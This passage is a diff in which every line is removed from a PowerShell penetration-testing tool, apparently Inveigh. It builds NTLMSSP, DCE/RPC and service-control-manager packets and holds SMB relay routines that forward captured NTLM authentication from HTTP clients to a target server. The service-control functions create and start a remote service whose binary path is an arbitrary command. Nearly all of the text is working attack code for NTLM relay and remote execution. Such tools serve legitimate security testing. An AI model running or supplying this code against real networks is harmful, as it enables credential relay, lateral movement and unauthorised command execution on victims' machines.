- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- if($packet_version)
- {
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version)
- }
-
- return $packet_NTLMSSPNegotiate
- }
-
- function Get-PacketNTLMSSPAuth()
- {
- param([Byte[]]$packet_NTLM_response)
-
- [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
- $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
- [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
- $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
- [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
- $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
- [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
- $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
-
- $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response)
-
- return $packet_NTLMSSPAuth
- }
-
- #RPC
-
- function Get-PacketRPCBind()
- {
- param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
-
- [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
-
- $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05))
- $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b))
- $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03))
- $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00))
- $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes)
- $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10))
- $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10))
- $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items)
- $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID)
- $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID)
- $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version)
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
-
- if($packet_num_ctx_items[0] -eq 2)
- {
- $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
- $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
- }
- elseif($packet_num_ctx_items[0] -eq 3)
- {
- $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
- $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
- $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
- $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04))
- $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
- }
-
- if($packet_call_ID -eq 3)
- {
- $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
- $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02))
- $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
- }
-
- return $packet_RPCBind
- }
-
- function Get-PacketRPCRequest()
- {
- param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
-
- if($packet_auth_length -gt 0)
- {
- $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
- }
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
- [Byte[]]$packet_frag_length = $packet_write_length[0,1]
- [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
- [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
- $packet_auth_length = $packet_auth_length[0,1]
-
- $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05))
- $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00))
- $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00))
- $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags)
- $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length)
- $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length)
- $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID)
- $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint)
- $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID)
- $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum)
-
- if($packet_data.Length)
- {
- $packet_RPCRequest.Add("RPCRequest_Data",$packet_data)
- }
-
- return $packet_RPCRequest
- }
-
- #SCM
-
- function Get-PacketSCMOpenSCManagerW()
- {
- param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
- [Byte[]]$packet_frag_length = $packet_write_length[0,1]
- [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
- $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID1 += 0x00,0x00
- $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID2 += 0x00,0x00
-
- $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
-
- return $packet_SCMOpenSCManagerW
- }
-
- function Get-PacketSCMCreateServiceW()
- {
- param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
- [Byte[]]$packet_command,[Byte[]]$packet_command_length)
-
- $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID += 0x00,0x00
-
- $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
-
- return $packet_SCMCreateServiceW
- }
-
- function Get-PacketSCMStartServiceW()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle)
- $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- return $packet_SCMStartServiceW
- }
-
- function Get-PacketSCMDeleteServiceW()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle)
-
- return $packet_SCMDeleteServiceW
- }
-
- function Get-PacketSCMCloseServiceHandle()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle)
-
- return $packet_SCM_CloseServiceW
- }
-
-}
-
-# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge
-$SMB_NTLM_functions_scriptblock =
-{
- function SMBNTLMChallenge
- {
- param ([Byte[]]$payload_bytes)
-
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLM_index = $payload.IndexOf("4E544C4D53535000")
-
- if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
- {
- $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
- }
-
- return $NTLM_challenge
- }
-
-}
-
-# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
-$SMB_relay_challenge_scriptblock =
-{
- function SMBRelayChallenge
- {
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version)
-
- if($SMB_relay_socket)
- {
- $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
- }
-
- $SMB_client_receive = New-Object System.Byte[] 1024
- $SMB_client_stage = 'NegotiateSMB'
-
- :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'NegotiateSMB'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
- $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
-
- if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
- {
- $SMB_version = 'SMB1'
- $SMB_client_stage = 'NTLMSSPNegotiate'
- }
- else
- {
- $SMB_client_stage = 'NegotiateSMB2'
- }
-
- if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
- {
- $inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target")
- $SMB_relay_socket.Close()
- $SMB_client_receive = $null
- $inveigh.SMB_relay = $false
- $SMB_client_stage = 'exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
- }
-
- }
-
- }
-
- 'NegotiateSMB2'
- {
- $SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $SMB2_message_ID = 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_data = Get-PacketSMB2NegotiateProtocolRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- $SMB_client_stage = 'NTLMSSPNegotiate'
- }
-
- 'NTLMSSPNegotiate'
- {
-
- if($SMB_version -eq 'SMB1')
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
- $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
- $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- }
- else
- {
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
- $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- }
-
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- $SMB_client_stage = 'exit'
- }
-
- }
-
- }
-
- return $SMB_client_receive
- }
-
-}
-
-# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
-$SMB_relay_response_scriptblock =
-{
- function SMBRelayResponse
- {
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
-
- $SMB_client_receive = New-Object System.Byte[] 1024
-
- if($SMB_relay_socket)
- {
- $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
- }
-
- if($SMB_version -eq 'SMB1')
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SMB_header["SMBHeader_UserID"] = $SMB_user_ID
- $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
- $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- }
- else
- {
- $SMB2_message_ID = 3
- $SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
- $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_auth
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- }
-
